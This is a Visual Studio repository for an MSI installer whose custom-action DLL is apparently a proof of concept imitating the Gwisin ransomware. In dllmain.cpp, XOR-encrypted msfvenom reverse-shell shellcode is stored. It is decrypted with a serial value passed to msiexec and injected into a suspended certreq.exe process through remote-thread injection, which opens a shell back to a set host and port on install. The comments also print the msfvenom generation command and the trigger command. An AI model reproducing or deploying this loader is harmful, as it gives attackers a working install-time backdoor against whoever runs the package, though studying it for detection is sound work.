├── .gitattributes
├── .gitignore
├── GwisinDll
├── GwisinDll.vcxproj
├── GwisinDll.vcxproj.filters
├── dllmain.cpp
├── framework.h
├── pch.cpp
└── pch.h
├── GwisinMsi.sln
├── GwisinMsi.vdproj
├── README.md
└── image
└── msi-demo.gif
/.gitattributes:
--------------------------------------------------------------------------------
1 | ###############################################################################
2 | # Set default behavior to automatically normalize line endings.
3 | ###############################################################################
4 | * text=auto
5 |
6 | ###############################################################################
7 | # Set default behavior for command prompt diff.
8 | #
9 | # This is need for earlier builds of msysgit that does not have it on by
10 | # default for csharp files.
11 | # Note: This is only used by command line
12 | ###############################################################################
13 | #*.cs diff=csharp
14 |
15 | ###############################################################################
16 | # Set the merge driver for project and solution files
17 | #
18 | # Merging from the command prompt will add diff markers to the files if there
19 | # are conflicts (Merging from VS is not affected by the settings below, in VS
20 | # the diff markers are never inserted). Diff markers may cause the following
21 | # file extensions to fail to load in VS. An alternative would be to treat
22 | # these files as binary and thus will always conflict and require user
23 | # intervention with every merge. To do so, just uncomment the entries below
24 | ###############################################################################
25 | #*.sln merge=binary
26 | #*.csproj merge=binary
27 | #*.vbproj merge=binary
28 | #*.vcxproj merge=binary
29 | #*.vcproj merge=binary
30 | #*.dbproj merge=binary
31 | #*.fsproj merge=binary
32 | #*.lsproj merge=binary
33 | #*.wixproj merge=binary
34 | #*.modelproj merge=binary
35 | #*.sqlproj merge=binary
36 | #*.wwaproj merge=binary
37 |
38 | ###############################################################################
39 | # behavior for image files
40 | #
41 | # image files are treated as binary by default.
42 | ###############################################################################
43 | #*.jpg binary
44 | #*.png binary
45 | #*.gif binary
46 |
47 | ###############################################################################
48 | # diff behavior for common document formats
49 | #
50 | # Convert binary document formats to text before diffing them. This feature
51 | # is only available from the command line. Turn it on by uncommenting the
52 | # entries below.
53 | ###############################################################################
54 | #*.doc diff=astextplain
55 | #*.DOC diff=astextplain
56 | #*.docx diff=astextplain
57 | #*.DOCX diff=astextplain
58 | #*.dot diff=astextplain
59 | #*.DOT diff=astextplain
60 | #*.pdf diff=astextplain
61 | #*.PDF diff=astextplain
62 | #*.rtf diff=astextplain
63 | #*.RTF diff=astextplain
64 |
--------------------------------------------------------------------------------
/.gitignore:
--------------------------------------------------------------------------------
1 | ## Ignore Visual Studio temporary files, build results, and
2 | ## files generated by popular Visual Studio add-ons.
3 | ##
4 | ## Get latest from https://github.com/github/gitignore/blob/main/VisualStudio.gitignore
5 |
6 | # User-specific files
7 | *.rsuser
8 | *.suo
9 | *.user
10 | *.userosscache
11 | *.sln.docstates
12 |
13 | # User-specific files (MonoDevelop/Xamarin Studio)
14 | *.userprefs
15 |
16 | # Mono auto generated files
17 | mono_crash.*
18 |
19 | # Build results
20 | [Dd]ebug/
21 | [Dd]ebugPublic/
22 | [Rr]elease/
23 | [Rr]eleases/
24 | x64/
25 | x86/
26 | [Ww][Ii][Nn]32/
27 | [Aa][Rr][Mm]/
28 | [Aa][Rr][Mm]64/
29 | bld/
30 | [Bb]in/
31 | [Oo]bj/
32 | [Ll]og/
33 | [Ll]ogs/
34 |
35 | # Visual Studio 2015/2017 cache/options directory
36 | .vs/
37 | # Uncomment if you have tasks that create the project's static files in wwwroot
38 | #wwwroot/
39 |
40 | # Visual Studio 2017 auto generated files
41 | Generated\ Files/
42 |
43 | # MSTest test Results
44 | [Tt]est[Rr]esult*/
45 | [Bb]uild[Ll]og.*
46 |
47 | # NUnit
48 | *.VisualState.xml
49 | TestResult.xml
50 | nunit-*.xml
51 |
52 | # Build Results of an ATL Project
53 | [Dd]ebugPS/
54 | [Rr]eleasePS/
55 | dlldata.c
56 |
57 | # Benchmark Results
58 | BenchmarkDotNet.Artifacts/
59 |
60 | # .NET Core
61 | project.lock.json
62 | project.fragment.lock.json
63 | artifacts/
64 |
65 | # ASP.NET Scaffolding
66 | ScaffoldingReadMe.txt
67 |
68 | # StyleCop
69 | StyleCopReport.xml
70 |
71 | # Files built by Visual Studio
72 | *_i.c
73 | *_p.c
74 | *_h.h
75 | *.ilk
76 | *.meta
77 | *.obj
78 | *.iobj
79 | *.pch
80 | *.pdb
81 | *.ipdb
82 | *.pgc
83 | *.pgd
84 | *.rsp
85 | *.sbr
86 | *.tlb
87 | *.tli
88 | *.tlh
89 | *.tmp
90 | *.tmp_proj
91 | *_wpftmp.csproj
92 | *.log
93 | *.tlog
94 | *.vspscc
95 | *.vssscc
96 | .builds
97 | *.pidb
98 | *.svclog
99 | *.scc
100 |
101 | # Chutzpah Test files
102 | _Chutzpah*
103 |
104 | # Visual C++ cache files
105 | ipch/
106 | *.aps
107 | *.ncb
108 | *.opendb
109 | *.opensdf
110 | *.sdf
111 | *.cachefile
112 | *.VC.db
113 | *.VC.VC.opendb
114 |
115 | # Visual Studio profiler
116 | *.psess
117 | *.vsp
118 | *.vspx
119 | *.sap
120 |
121 | # Visual Studio Trace Files
122 | *.e2e
123 |
124 | # TFS 2012 Local Workspace
125 | $tf/
126 |
127 | # Guidance Automation Toolkit
128 | *.gpState
129 |
130 | # ReSharper is a .NET coding add-in
131 | _ReSharper*/
132 | *.[Rr]e[Ss]harper
133 | *.DotSettings.user
134 |
135 | # TeamCity is a build add-in
136 | _TeamCity*
137 |
138 | # DotCover is a Code Coverage Tool
139 | *.dotCover
140 |
141 | # AxoCover is a Code Coverage Tool
142 | .axoCover/*
143 | !.axoCover/settings.json
144 |
145 | # Coverlet is a free, cross platform Code Coverage Tool
146 | coverage*.json
147 | coverage*.xml
148 | coverage*.info
149 |
150 | # Visual Studio code coverage results
151 | *.coverage
152 | *.coveragexml
153 |
154 | # NCrunch
155 | _NCrunch_*
156 | .*crunch*.local.xml
157 | nCrunchTemp_*
158 |
159 | # MightyMoose
160 | *.mm.*
161 | AutoTest.Net/
162 |
163 | # Web workbench (sass)
164 | .sass-cache/
165 |
166 | # Installshield output folder
167 | [Ee]xpress/
168 |
169 | # DocProject is a documentation generator add-in
170 | DocProject/buildhelp/
171 | DocProject/Help/*.HxT
172 | DocProject/Help/*.HxC
173 | DocProject/Help/*.hhc
174 | DocProject/Help/*.hhk
175 | DocProject/Help/*.hhp
176 | DocProject/Help/Html2
177 | DocProject/Help/html
178 |
179 | # Click-Once directory
180 | publish/
181 |
182 | # Publish Web Output
183 | *.[Pp]ublish.xml
184 | *.azurePubxml
185 | # Note: Comment the next line if you want to checkin your web deploy settings,
186 | # but database connection strings (with potential passwords) will be unencrypted
187 | *.pubxml
188 | *.publishproj
189 |
190 | # Microsoft Azure Web App publish settings. Comment the next line if you want to
191 | # checkin your Azure Web App publish settings, but sensitive information contained
192 | # in these scripts will be unencrypted
193 | PublishScripts/
194 |
195 | # NuGet Packages
196 | *.nupkg
197 | # NuGet Symbol Packages
198 | *.snupkg
199 | # The packages folder can be ignored because of Package Restore
200 | **/[Pp]ackages/*
201 | # except build/, which is used as an MSBuild target.
202 | !**/[Pp]ackages/build/
203 | # Uncomment if necessary however generally it will be regenerated when needed
204 | #!**/[Pp]ackages/repositories.config
205 | # NuGet v3's project.json files produces more ignorable files
206 | *.nuget.props
207 | *.nuget.targets
208 |
209 | # Microsoft Azure Build Output
210 | csx/
211 | *.build.csdef
212 |
213 | # Microsoft Azure Emulator
214 | ecf/
215 | rcf/
216 |
217 | # Windows Store app package directories and files
218 | AppPackages/
219 | BundleArtifacts/
220 | Package.StoreAssociation.xml
221 | _pkginfo.txt
222 | *.appx
223 | *.appxbundle
224 | *.appxupload
225 |
226 | # Visual Studio cache files
227 | # files ending in .cache can be ignored
228 | *.[Cc]ache
229 | # but keep track of directories ending in .cache
230 | !?*.[Cc]ache/
231 |
232 | # Others
233 | ClientBin/
234 | ~$*
235 | *~
236 | *.dbmdl
237 | *.dbproj.schemaview
238 | *.jfm
239 | *.pfx
240 | *.publishsettings
241 | orleans.codegen.cs
242 |
243 | # Including strong name files can present a security risk
244 | # (https://github.com/github/gitignore/pull/2483#issue-259490424)
245 | #*.snk
246 |
247 | # Since there are multiple workflows, uncomment next line to ignore bower_components
248 | # (https://github.com/github/gitignore/pull/1529#issuecomment-104372622)
249 | #bower_components/
250 |
251 | # RIA/Silverlight projects
252 | Generated_Code/
253 |
254 | # Backup & report files from converting an old project file
255 | # to a newer Visual Studio version. Backup files are not needed,
256 | # because we have git ;-)
257 | _UpgradeReport_Files/
258 | Backup*/
259 | UpgradeLog*.XML
260 | UpgradeLog*.htm
261 | ServiceFabricBackup/
262 | *.rptproj.bak
263 |
264 | # SQL Server files
265 | *.mdf
266 | *.ldf
267 | *.ndf
268 |
269 | # Business Intelligence projects
270 | *.rdl.data
271 | *.bim.layout
272 | *.bim_*.settings
273 | *.rptproj.rsuser
274 | *- [Bb]ackup.rdl
275 | *- [Bb]ackup ([0-9]).rdl
276 | *- [Bb]ackup ([0-9][0-9]).rdl
277 |
278 | # Microsoft Fakes
279 | FakesAssemblies/
280 |
281 | # GhostDoc plugin setting file
282 | *.GhostDoc.xml
283 |
284 | # Node.js Tools for Visual Studio
285 | .ntvs_analysis.dat
286 | node_modules/
287 |
288 | # Visual Studio 6 build log
289 | *.plg
290 |
291 | # Visual Studio 6 workspace options file
292 | *.opt
293 |
294 | # Visual Studio 6 auto-generated workspace file (contains which files were open etc.)
295 | *.vbw
296 |
297 | # Visual Studio 6 auto-generated project file (contains which files were open etc.)
298 | *.vbp
299 |
300 | # Visual Studio 6 workspace and project file (working project files containing files to include in project)
301 | *.dsw
302 | *.dsp
303 |
304 | # Visual Studio 6 technical files
305 | *.ncb
306 | *.aps
307 |
308 | # Visual Studio LightSwitch build output
309 | **/*.HTMLClient/GeneratedArtifacts
310 | **/*.DesktopClient/GeneratedArtifacts
311 | **/*.DesktopClient/ModelManifest.xml
312 | **/*.Server/GeneratedArtifacts
313 | **/*.Server/ModelManifest.xml
314 | _Pvt_Extensions
315 |
316 | # Paket dependency manager
317 | .paket/paket.exe
318 | paket-files/
319 |
320 | # FAKE - F# Make
321 | .fake/
322 |
323 | # CodeRush personal settings
324 | .cr/personal
325 |
326 | # Python Tools for Visual Studio (PTVS)
327 | __pycache__/
328 | *.pyc
329 |
330 | # Cake - Uncomment if you are using it
331 | # tools/**
332 | # !tools/packages.config
333 |
334 | # Tabs Studio
335 | *.tss
336 |
337 | # Telerik's JustMock configuration file
338 | *.jmconfig
339 |
340 | # BizTalk build output
341 | *.btp.cs
342 | *.btm.cs
343 | *.odx.cs
344 | *.xsd.cs
345 |
346 | # OpenCover UI analysis results
347 | OpenCover/
348 |
349 | # Azure Stream Analytics local run output
350 | ASALocalRun/
351 |
352 | # MSBuild Binary and Structured Log
353 | *.binlog
354 |
355 | # NVidia Nsight GPU debugger configuration file
356 | *.nvuser
357 |
358 | # MFractors (Xamarin productivity tool) working folder
359 | .mfractor/
360 |
361 | # Local History for Visual Studio
362 | .localhistory/
363 |
364 | # Visual Studio History (VSHistory) files
365 | .vshistory/
366 |
367 | # BeatPulse healthcheck temp database
368 | healthchecksdb
369 |
370 | # Backup folder for Package Reference Convert tool in Visual Studio 2017
371 | MigrationBackup/
372 |
373 | # Ionide (cross platform F# VS Code tools) working folder
374 | .ionide/
375 |
376 | # Fody - auto-generated XML schema
377 | FodyWeavers.xsd
378 |
379 | # VS Code files for those working on multiple tools
380 | .vscode/*
381 | !.vscode/settings.json
382 | !.vscode/tasks.json
383 | !.vscode/launch.json
384 | !.vscode/extensions.json
385 | *.code-workspace
386 |
387 | # Local History for Visual Studio Code
388 | .history/
389 |
390 | # Windows Installer files from build outputs
391 | *.cab
392 | *.msi
393 | *.msix
394 | *.msm
395 | *.msp
396 |
397 | # JetBrains Rider
398 | *.sln.iml
399 |
--------------------------------------------------------------------------------
/GwisinDll/GwisinDll.vcxproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | Win32
7 |
8 |
9 | Release
10 | Win32
11 |
12 |
13 | Debug
14 | x64
15 |
16 |
17 | Release
18 | x64
19 |
20 |
21 |
22 | 16.0
23 | Win32Proj
24 | {26c1987e-1cbf-4cdd-9e2d-736306cc534a}
25 | GwisinDll
26 | 10.0
27 |
28 |
29 |
30 | DynamicLibrary
31 | true
32 | v142
33 | Unicode
34 |
35 |
36 | DynamicLibrary
37 | false
38 | v142
39 | true
40 | MultiByte
41 |
42 |
43 | DynamicLibrary
44 | true
45 | v142
46 | Unicode
47 |
48 |
49 | DynamicLibrary
50 | false
51 | v142
52 | true
53 | MultiByte
54 |
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 |
74 | true
75 |
76 |
77 | false
78 |
79 |
80 | true
81 |
82 |
83 | false
84 | $(ProjectDir)$(Platform)\$(Configuration)\
85 | $(ProjectDir)$(Platform)\$(Configuration)\
86 |
87 |
88 |
89 | Level3
90 | true
91 | WIN32;_DEBUG;GWISINDLL_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions)
92 | true
93 | Use
94 | pch.h
95 |
96 |
97 | Windows
98 | true
99 | false
100 |
101 |
102 |
103 |
104 | Level3
105 | true
106 | true
107 | true
108 | _CRT_SECURE_NO_WARNINGS
109 | true
110 | Use
111 | pch.h
112 |
113 |
114 | Windows
115 | true
116 | true
117 | false
118 | false
119 |
120 |
121 |
122 |
123 | Level3
124 | true
125 | _DEBUG;GWISINDLL_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions)
126 | true
127 | Use
128 | pch.h
129 |
130 |
131 | Windows
132 | true
133 | false
134 |
135 |
136 |
137 |
138 | Level3
139 | true
140 | true
141 | true
142 | _CRT_SECURE_NO_WARNINGS
143 | true
144 | Use
145 | pch.h
146 |
147 |
148 | Windows
149 | true
150 | true
151 | false
152 | false
153 |
154 |
155 |
156 |
157 |
158 |
159 |
160 |
161 |
162 | Create
163 | Create
164 | Create
165 | Create
166 |
167 |
168 |
169 |
170 |
171 |
--------------------------------------------------------------------------------
/GwisinDll/GwisinDll.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Header Files
20 |
21 |
22 | Header Files
23 |
24 |
25 |
26 |
27 | Source Files
28 |
29 |
30 | Source Files
31 |
32 |
33 |
--------------------------------------------------------------------------------
/GwisinDll/dllmain.cpp:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 | #include
4 | #include
5 | #include
6 | #pragma comment(lib, "msi.lib")
7 |
8 | // credit: Sektor7 RTO Malware Essential Course
9 | void XOR(char* data, size_t data_len, char* key, size_t key_len) {
10 | int j;
11 |
12 | j = 0;
13 | for (int i = 0; i < data_len; i++) {
14 | if (j == key_len - 1) j = 0;
15 |
16 | data[i] = data[i] ^ key[j];
17 | j++;
18 | }
19 | }
20 |
21 | extern "C" __declspec(dllexport) UINT __stdcall GwisinCustom(MSIHANDLE hInstall) {
22 | PROCESS_INFORMATION processInformation;
23 | STARTUPINFO startupInfo;
24 | BOOL creationResult;
25 |
26 | // msfvenom -p windows/x64/shell_reverse_tcp lhost=192.168.40.182 lport=8443 exitfunc=thread --encrypt xor --encrypt-key "serialmorelikecereal" -f c
27 | // msiexec.exe /qn /i SERIAL=serialmorelikecereal
28 | unsigned char buf[] =
29 | "\x8f\x2d\xf1\x8d\x91\x84\xa1\x6f\x72\x65\x2d\x38\x2a\x35\x31"
30 | "\x34\x24\x2d\x50\xbe\x16\x2d\xf9\x3b\x01\x24\xe6\x3d\x6a\x2d"
31 | "\xe7\x3b\x4b\x2d\xe8\x17\x22\x2d\x6e\xdb\x39\x2f\x3f\x58\xa8"
32 | "\x24\x5c\xaf\xde\x59\x0d\x15\x69\x49\x43\x24\xb3\xac\x6c\x2d"
33 | "\x72\xa4\x90\x84\x33\x24\xe6\x3d\x52\xee\x2e\x55\x2a\x34\x2b"
34 | "\x64\xa2\x03\xe0\x14\x6b\x6e\x70\x66\xe4\x1e\x6d\x6f\x72\xee"
35 | "\xec\xe1\x6b\x65\x63\x2d\xf7\xa5\x15\x0b\x3b\x64\xa2\x39\xea"
36 | "\x24\x75\x2b\xf9\x25\x4c\x20\x6a\xb5\x80\x33\x3f\x54\xa8\x24"
37 | "\x8c\xac\x33\xe2\x55\xe4\x25\x6e\xa4\x2d\x5d\xa9\xc7\x24\xa2"
38 | "\xac\x7f\x24\x60\xad\x4b\x85\x07\x98\x2d\x6f\x21\x4b\x7a\x20"
39 | "\x55\xb8\x1e\xbd\x3b\x21\xf9\x25\x45\x25\x72\xb5\x14\x28\xea"
40 | "\x60\x25\x2b\xf9\x25\x70\x20\x6a\xb5\x22\xee\x76\xed\x20\x34"
41 | "\x32\x3d\x3a\x68\xb1\x32\x34\x35\x33\x3d\x2d\x30\x2a\x3f\x2b"
42 | "\xe6\x9e\x45\x20\x3e\x8c\x85\x2a\x28\x38\x36\x25\xe4\x60\x8c"
43 | "\x27\x96\x94\x9a\x3e\x2c\xcc\x12\x12\x5e\x2c\x56\x40\x69\x61"
44 | "\x2d\x3b\x26\xfb\x83\x24\xe8\x87\xc5\x62\x65\x72\x2c\xe8\x89"
45 | "\x3a\xd9\x70\x69\x41\x97\xad\xc7\x5a\xd3\x2d\x3d\x22\xec\x87"
46 | "\x29\xfb\x94\x20\xd6\x3f\x12\x54\x6e\x9e\xb9\x21\xe6\x98\x0d"
47 | "\x6d\x68\x6b\x65\x3a\x24\xc8\x4c\xe1\x07\x73\x9a\xa7\x03\x6b"
48 | "\x2d\x33\x3f\x22\x28\x5d\xa0\x26\x54\xa3\x2d\x8d\xa5\x29\xe5"
49 | "\xb1\x2d\x8d\xa9\x29\xe5\xac\x2e\xc8\x8f\x63\xb6\x8b\x9a\xb6"
50 | "\x2d\xfb\xa2\x0b\x7c\x32\x3d\x3e\xe0\x83\x24\xe4\x96\x33\xdf"
51 | "\xf5\xcc\x1f\x04\x9c\xb0\xf7\xa5\x15\x66\x3a\x9a\xbc\x1c\x84"
52 | "\x84\xfe\x6f\x72\x65\x24\xea\x87\x75\x2b\xec\x90\x28\x50\xa5"
53 | "\x19\x61\x33\x31\x29\xe5\x94\x2e\xc8\x67\xb5\xa1\x34\x9a\xb6"
54 | "\xe6\x8a\x65\x1f\x39\x3b\xe6\xb6\x49\x3f\xe5\x9b\x05\x32\x24"
55 | "\x35\x01\x6b\x75\x63\x65\x33\x3d\x29\xe5\x81\x2d\x43\xa0\x20"
56 | "\xd6\x35\xcb\x21\x80\x93\xbc\x23\xec\xa0\x2c\xfb\xa2\x2c\x5d"
57 | "\xba\x2c\xfb\x99\x29\xe5\xb7\x27\xfb\x9c\x2d\xd3\x69\xbc\xab"
58 | "\x3a\x8d\xb0\xe2\x94\x73\x18\x5a\x31\x20\x3b\x34\x07\x72\x25"
59 | "\x6c\x69\x2a\x3d\x09\x65\x28\x24\xdb\x67\x5c\x6a\x42\x96\xb4"
60 | "\x3b\x34\x2e\xc8\x10\x02\x24\x0a\x9a\xb6\x2c\x8d\xab\x88\x50"
61 | "\x8c\x9a\x8d\x21\x60\xaf\x25\x46\xb4\x2d\xe9\x9f\x1e\xd1\x22"
62 | "\x9a\x95\x3d\x0b\x6c\x2a\xde\x92\x74\x4b\x66\x2c\xe6\xa8\x9a"
63 | "\xb9";
64 |
65 | char msiPropValue[256];
66 | DWORD msiPropLength = 256;
67 |
68 | // Get custom action data from commandline. ex) msiexec /qn /i SERIAL= LICENSE=
69 | MsiGetProperty(hInstall, TEXT("CustomActionData"), msiPropValue, &msiPropLength);
70 |
71 | char* tSerial = strtok((char*)msiPropValue, " ");
72 | char* tLicense = strtok(NULL, "");
73 |
74 | // Serial value from msiexec commandline. Used as xor key for shellcode decryption.
75 | char* serial = strtok((char*)tSerial, "=");
76 | char* serialValue = strtok(NULL, "");
77 |
78 | // License value is ignored in this PoC.
79 | char* license = strtok((char*)tLicense, "=");
80 | char* licenseValue = strtok(NULL, "");
81 |
82 | // Decrypt shellcode with serial value. +1 because null terminator at the end
83 | XOR((char*)buf, sizeof(buf), serialValue, strlen(serialValue) + 1);
84 |
85 | STARTUPINFO si;
86 | si.cb = sizeof(si);
87 | ZeroMemory(&si, sizeof(si));
88 |
89 | PROCESS_INFORMATION pi;
90 | ZeroMemory(&pi, sizeof(pi));
91 |
92 | // Certreq because Gwisin used it. No window + suspended for no gui.
93 | CreateProcess("C:\\windows\\system32\\certreq.exe", NULL, 0, 0, FALSE, CREATE_NO_WINDOW | CREATE_SUSPENDED, NULL, "C:\\Windows\\system32", &si, &pi);
94 |
95 | DWORD pid = pi.dwProcessId;
96 | HANDLE hProc = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);
97 | LPVOID pAlloc = VirtualAllocEx(hProc, nullptr, sizeof(buf), MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
98 | SIZE_T bytesWritten;
99 | WriteProcessMemory(hProc, pAlloc, buf, sizeof(buf), &bytesWritten);
100 | DWORD flProtect = 0;
101 | VirtualProtectEx(hProc, pAlloc, sizeof(buf), PAGE_EXECUTE_READ, &flProtect);
102 | //Sleep(20000); // debug
103 | HANDLE rThread = CreateRemoteThread(hProc, NULL, 0, (LPTHREAD_START_ROUTINE)pAlloc, NULL, 0, NULL);
104 |
105 | return 0;
106 | }
107 |
108 | extern "C" __declspec(dllexport) HRESULT DllRegisterServer() {
109 | return 0;
110 | }
111 |
112 | extern "C" __declspec(dllexport) HRESULT DllUnregisterServer() {
113 | return 0;
114 | }
115 |
116 | BOOL APIENTRY DllMain(HMODULE hModule,
117 | DWORD ul_reason_for_call,
118 | LPVOID lpReserved
119 | )
120 | {
121 | switch (ul_reason_for_call)
122 | {
123 | case DLL_PROCESS_ATTACH:
124 | case DLL_THREAD_ATTACH:
125 | case DLL_THREAD_DETACH:
126 | case DLL_PROCESS_DETACH:
127 | break;
128 | }
129 | return TRUE;
130 | }
--------------------------------------------------------------------------------
/GwisinDll/framework.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 |
3 | #define WIN32_LEAN_AND_MEAN // Exclude rarely-used stuff from Windows headers
4 | // Windows Header Files
5 | #include
6 |
--------------------------------------------------------------------------------
/GwisinDll/pch.cpp:
--------------------------------------------------------------------------------
1 | // pch.cpp: source file corresponding to the pre-compiled header
2 |
3 | #include "pch.h"
4 |
5 | // When you are using pre-compiled headers, this source file is necessary for compilation to succeed.
6 |
--------------------------------------------------------------------------------
/GwisinDll/pch.h:
--------------------------------------------------------------------------------
1 | // pch.h: This is a precompiled header file.
2 | // Files listed below are compiled only once, improving build performance for future builds.
3 | // This also affects IntelliSense performance, including code completion and many code browsing features.
4 | // However, files listed here are ALL re-compiled if any one of them is updated between builds.
5 | // Do not add files here that you will be updating frequently as this negates the performance advantage.
6 |
7 | #ifndef PCH_H
8 | #define PCH_H
9 |
10 | // add headers that you want to pre-compile here
11 | #include "framework.h"
12 |
13 | #endif //PCH_H
14 |
--------------------------------------------------------------------------------
/GwisinMsi.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio Version 16
4 | VisualStudioVersion = 16.0.32802.440
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{54435603-DBB4-11D2-8724-00A0C9A8B90C}") = "GwisinMsi", "GwisinMsi.vdproj", "{8CDDDCE6-607D-4FDA-9953-6CEFF9C296BA}"
7 | EndProject
8 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "GwisinDll", "GwisinDll\GwisinDll.vcxproj", "{26C1987E-1CBF-4CDD-9E2D-736306CC534A}"
9 | EndProject
10 | Global
11 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
12 | Debug|x64 = Debug|x64
13 | Debug|x86 = Debug|x86
14 | Release|x64 = Release|x64
15 | Release|x86 = Release|x86
16 | EndGlobalSection
17 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
18 | {8CDDDCE6-607D-4FDA-9953-6CEFF9C296BA}.Debug|x64.ActiveCfg = Debug
19 | {8CDDDCE6-607D-4FDA-9953-6CEFF9C296BA}.Debug|x64.Build.0 = Debug
20 | {8CDDDCE6-607D-4FDA-9953-6CEFF9C296BA}.Debug|x86.ActiveCfg = Debug
21 | {8CDDDCE6-607D-4FDA-9953-6CEFF9C296BA}.Debug|x86.Build.0 = Debug
22 | {8CDDDCE6-607D-4FDA-9953-6CEFF9C296BA}.Release|x64.ActiveCfg = Release
23 | {8CDDDCE6-607D-4FDA-9953-6CEFF9C296BA}.Release|x64.Build.0 = Release
24 | {8CDDDCE6-607D-4FDA-9953-6CEFF9C296BA}.Release|x86.ActiveCfg = Release
25 | {8CDDDCE6-607D-4FDA-9953-6CEFF9C296BA}.Release|x86.Build.0 = Release
26 | {26C1987E-1CBF-4CDD-9E2D-736306CC534A}.Debug|x64.ActiveCfg = Debug|x64
27 | {26C1987E-1CBF-4CDD-9E2D-736306CC534A}.Debug|x64.Build.0 = Debug|x64
28 | {26C1987E-1CBF-4CDD-9E2D-736306CC534A}.Debug|x86.ActiveCfg = Debug|Win32
29 | {26C1987E-1CBF-4CDD-9E2D-736306CC534A}.Debug|x86.Build.0 = Debug|Win32
30 | {26C1987E-1CBF-4CDD-9E2D-736306CC534A}.Release|x64.ActiveCfg = Release|x64
31 | {26C1987E-1CBF-4CDD-9E2D-736306CC534A}.Release|x64.Build.0 = Release|x64
32 | {26C1987E-1CBF-4CDD-9E2D-736306CC534A}.Release|x86.ActiveCfg = Release|Win32
33 | {26C1987E-1CBF-4CDD-9E2D-736306CC534A}.Release|x86.Build.0 = Release|Win32
34 | EndGlobalSection
35 | GlobalSection(SolutionProperties) = preSolution
36 | HideSolutionNode = FALSE
37 | EndGlobalSection
38 | GlobalSection(ExtensibilityGlobals) = postSolution
39 | SolutionGuid = {5599A1D7-28E2-400F-88B8-3965155C5F61}
40 | EndGlobalSection
41 | EndGlobal
42 |
--------------------------------------------------------------------------------
/GwisinMsi.vdproj:
--------------------------------------------------------------------------------
1 | "DeployProject"
2 | {
3 | "VSVersion" = "3:800"
4 | "ProjectType" = "8:{978C614F-708E-4E1A-B201-565925725DBA}"
5 | "IsWebType" = "8:FALSE"
6 | "ProjectName" = "8:GwisinMsi"
7 | "LanguageId" = "3:1033"
8 | "CodePage" = "3:1252"
9 | "UILanguageId" = "3:1033"
10 | "SccProjectName" = "8:"
11 | "SccLocalPath" = "8:"
12 | "SccAuxPath" = "8:"
13 | "SccProvider" = "8:"
14 | "Hierarchy"
15 | {
16 | "Entry"
17 | {
18 | "MsmKey" = "8:_D42A3724FA684F68BB55690DB47300B8"
19 | "OwnerKey" = "8:_UNDEFINED"
20 | "MsmSig" = "8:_UNDEFINED"
21 | }
22 | }
23 | "Configurations"
24 | {
25 | "Debug"
26 | {
27 | "DisplayName" = "8:Debug"
28 | "IsDebugOnly" = "11:TRUE"
29 | "IsReleaseOnly" = "11:FALSE"
30 | "OutputFilename" = "8:Debug\\GwisinMsi.msi"
31 | "PackageFilesAs" = "3:2"
32 | "PackageFileSize" = "3:-2147483648"
33 | "CabType" = "3:1"
34 | "Compression" = "3:2"
35 | "SignOutput" = "11:FALSE"
36 | "CertificateFile" = "8:"
37 | "PrivateKeyFile" = "8:"
38 | "TimeStampServer" = "8:"
39 | "InstallerBootstrapper" = "3:2"
40 | }
41 | "Release"
42 | {
43 | "DisplayName" = "8:Release"
44 | "IsDebugOnly" = "11:FALSE"
45 | "IsReleaseOnly" = "11:TRUE"
46 | "OutputFilename" = "8:Release\\GwisinMsi.msi"
47 | "PackageFilesAs" = "3:2"
48 | "PackageFileSize" = "3:-2147483648"
49 | "CabType" = "3:1"
50 | "Compression" = "3:2"
51 | "SignOutput" = "11:FALSE"
52 | "CertificateFile" = "8:"
53 | "PrivateKeyFile" = "8:"
54 | "TimeStampServer" = "8:"
55 | "InstallerBootstrapper" = "3:2"
56 | }
57 | }
58 | "Deployable"
59 | {
60 | "CustomAction"
61 | {
62 | "{4AA51A2D-7D85-4A59-BA75-B0809FC8B380}:_5327BE0E34934EC283AB13E215E8EEBE"
63 | {
64 | "Name" = "8:GwisinDll.dll"
65 | "Condition" = "8:"
66 | "Object" = "8:_D42A3724FA684F68BB55690DB47300B8"
67 | "FileType" = "3:1"
68 | "InstallAction" = "3:1"
69 | "Arguments" = "8:"
70 | "EntryPoint" = "8:GwisinCustom"
71 | "Sequence" = "3:1"
72 | "Identifier" = "8:_88F4EDE8_92E4_40F7_86F0_C4BA835A83E8"
73 | "InstallerClass" = "11:FALSE"
74 | "CustomActionData" = "8:SERIAL=[SERIAL] LICENS=[LICENSE]"
75 | "Run64Bit" = "11:TRUE"
76 | }
77 | }
78 | "DefaultFeature"
79 | {
80 | "Name" = "8:DefaultFeature"
81 | "Title" = "8:"
82 | "Description" = "8:"
83 | }
84 | "ExternalPersistence"
85 | {
86 | "LaunchCondition"
87 | {
88 | }
89 | }
90 | "File"
91 | {
92 | "{1FB2D0AE-D3B9-43D4-B9DD-F88EC61E35DE}:_D42A3724FA684F68BB55690DB47300B8"
93 | {
94 | "SourcePath" = "8:GwisinDll\\x64\\Release\\GwisinDll.dll"
95 | "TargetName" = "8:GwisinDll.dll"
96 | "Tag" = "8:"
